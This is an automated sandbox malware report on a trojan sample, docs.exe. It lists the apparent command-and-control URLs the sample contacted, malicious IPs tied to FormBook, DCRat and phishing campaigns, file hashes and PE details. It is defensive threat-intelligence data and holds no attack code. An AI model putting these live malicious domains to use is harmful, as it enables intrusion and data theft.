                                                                                                                                              http://www.ealerslot.net/c24t/www.aithful.eventsexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.oko.eventsexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://www.eviewmadu.top/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://www.oko.events/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://www.uijiuw.topexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.amilablackwell.online/c24t/www.eviewmadu.topexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://www.khizmetlergirisyapzzz2024.net/c24t/explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.venir-bienne.infoexplorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmpfalse
unknown
http://www.earing-tests-69481.bondReferer: | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.23fd595ig.autos/c24t/www.j88.travel | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.j88.travel/c24t/ | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.j88.travel | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.23fd595ig.autosReferer: | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.eviewmadu.top | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz | explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://excel.office.com- | explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.472.topReferer: | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.ealerslot.net | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg | explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark | explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exe | false | | unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA | explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.delark.click/c24t/www.ridges-freezers-56090.bond | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.ealerslot.net/c24t/ | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c | explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve | explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://powerpoint.office.comEMd | explorer.exe, 00000006.00000002.4606649141.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.venir-bienne.infoReferer: | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation | explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.hecreature.tech/c24t/ | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/ | explorer.exe, 00000006.00000000.2157815827.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603162290.000000000962B000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.consuyt.xyz | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2 | explorer.exe, 00000006.00000002.4608809096.0000000010C8F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.00000000054DF000.00000004.10000000.00040000.00000000.sdmp | false | | unknown
http://www.delark.click/c24t/ | explorer.exe, 00000006.00000003.3727039722.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986139173.000000000C519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4607845759.000000000C520000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.96.3 | www.j88.travel | European Union | | 13335 | CLOUDFLARENETUS | true
185.26.122.70 | www.oko.events | Russian Federation | | 62082 | HOSTLANDRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522819
Start date and time: 2024-09-30 18:15:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: docs.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/6@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 119
• Number of non-executed functions: 358
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: docs.exe
Time     | Type            | Description
12:16:00 | API Interceptor | 1x Sleep call for process: docs.exe modified
12:16:03 | API Interceptor | 12x Sleep call for process: powershell.exe modified
12:16:10 | API Interceptor | 8586818x Sleep call for process: explorer.exe modified
12:16:45 | API Interceptor | 7555907x Sleep call for process: wscript.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.96.3 | https://wwvmicrosx.live/office365/office_cookies/main | malicious | HTMLPhisher | wwvmicrosx.live/office365/office_cookies/main/
188.114.96.3 | http://fitur-dana-terbaru-2024.pages.dev/ | malicious | HTMLPhisher | fitur-dana-terbaru-2024.pages.dev/favicon.ico
188.114.96.3 | http://mobilelegendsmycode.com/ | malicious | Unknown | mobilelegendsmycode.com/favicon.ico
188.114.96.3 | http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE | malicious | WinSearchAbuse | download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
188.114.96.3 | ADNOC requesting RFQ.exe | malicious | FormBook | www.chinaen.org/zi4g/
188.114.96.3 | http://twint.ch-daten.com/de/receive/bank/sgkb/79469380 | malicious | Unknown | twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
188.114.96.3 | Cbequipment-Voice Audio Interface.pdf | malicious | HTMLPhisher | www.444317.com/
188.114.96.3 | Sept order.doc | malicious | FormBook | www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
188.114.96.3 | 1e#U0414.exe | malicious | Lokibot | dddotx.shop/Mine/PWS/fre.php
188.114.96.3 | https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH | malicious | Unknown | hdcy.emcl00.com/qRCfs/
185.26.122.70 | Dekont.exe | malicious | FormBook | www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.oko.events | Dekont.exe | malicious | FormBook | 185.26.122.70
www.oko.events | Quotation #10091.exe | malicious | FormBook | 185.26.122.70
www.oko.events | PAGO_200924.exe | malicious | FormBook | 185.26.122.70
www.j88.travel | SOA.exe | malicious | FormBook | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTLANDRU | Dekont.exe | malicious | FormBook | 185.26.122.70
HOSTLANDRU | Wave.exe | malicious | Discord Token Stealer, Orcus, SugarDump | 185.37.62.158
HOSTLANDRU | DFpUKTL6kg.exe | malicious | DCRat | 185.26.122.81
HOSTLANDRU | http://mydpd.space/ | malicious | DCRat, PureLog Stealer | 185.26.122.30
HOSTLANDRU | HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | malicious | DCRat | 185.26.122.79
HOSTLANDRU | yk2Eh24FDd.exe | malicious | Unknown | 185.26.122.81
HOSTLANDRU | hT0xyYJthf.exe | malicious | Unknown | 185.26.122.81
HOSTLANDRU | https://hideuri.com/EXWJgm | malicious | Unknown | 185.26.122.79
HOSTLANDRU | rwDENO48jg.elf | malicious | Mirai, Moobot | 185.221.215.184
HOSTLANDRU | i21878JK11.exe | malicious | DCRat | 185.26.122.80
CLOUDFLARENETUS | https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true | malicious | Unknown | 104.18.35.212
CLOUDFLARENETUS | https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://serrespec.weebly.com/tc2000-stock-charting-software.html | malicious | Unknown | 104.22.52.71
CLOUDFLARENETUS | https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://formacionadieste.com.de/Vrvz/ | malicious | HTMLPhisher | 172.67.148.87
CLOUDFLARENETUS | http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb | malicious | Unknown | 104.18.86.42
CLOUDFLARENETUS | AMG Cargo Logistic.docx | malicious | Remcos | 172.67.216.244
No context
No context
Process: C:\Users\user\Desktop\docs.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380747059108785
Encrypted: false
SSDEEP: 48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:lGLHxvIIwLgZ2KRHWLOugQs
MD5: FE04A26B951232A817435FE243AF4AF7
SHA1: 86834917D158EEF6387E90C3E81A535885E97EB4
SHA-256: 30B53DB6EE84E8F39DB17AC3D9033EFDD467EE5CF48A30E2841CDDEB2B47D4E7
SHA-512: D4F431E48FE43095E8C893AA56CA2EC171043DF40E696AD698938B0D39D5CC1DE4CFBF2B88EC7B02F086DED236873F1B9A297F7B16C12933A44B55875EE5FF40
Malicious: false
Reputation: low
Preview: @...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):7.646580632187834
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                    File name:docs.exe
                                                                                                                                                                                                                    File size:740'872 bytes
                                                                                                                                                                                                                    MD5:136dcc6497b13fe87bbad4aa5f859593
                                                                                                                                                                                                                    SHA1:9da85420d2681d65df6757f44a0c8055ce6c1fba
                                                                                                                                                                                                                    SHA256:c89c37f0b5dc89251da6c37aa8e1071c43d52c80fd2326f1e6de8dcd5eaf0dfc
                                                                                                                                                                                                                    SHA512:5e842aa0858845c4322c847fd2497cfe515a2ed62e36337978a020c061d6555cb19dbac58c6c988a97d3bfd88de66bfc4a4e96bf1c46e78d94c2435051cd1c91
                                                                                                                                                                                                                    SSDEEP:12288:21ZF8Kz3TPb4DryC6L1+0rs/yo05u30HzdHpGo1UV60QFLZSkR:2yeyrUp1o/4HiV60sZh
                                                                                                                                                                                                                    TLSH:92F4CFC03B68B719DE784A74857ADDB492B52D587010FAE62EDD3B9739AC3109E0CF42
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............n,... ...@....@.. ....................................@................................
                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                    Entrypoint:0x4b2c6e
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0xDE85E6B9 [Tue Apr 20 16:35:05 2088 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                    • 13/11/2018 01:00:00 09/11/2021 00:59:59
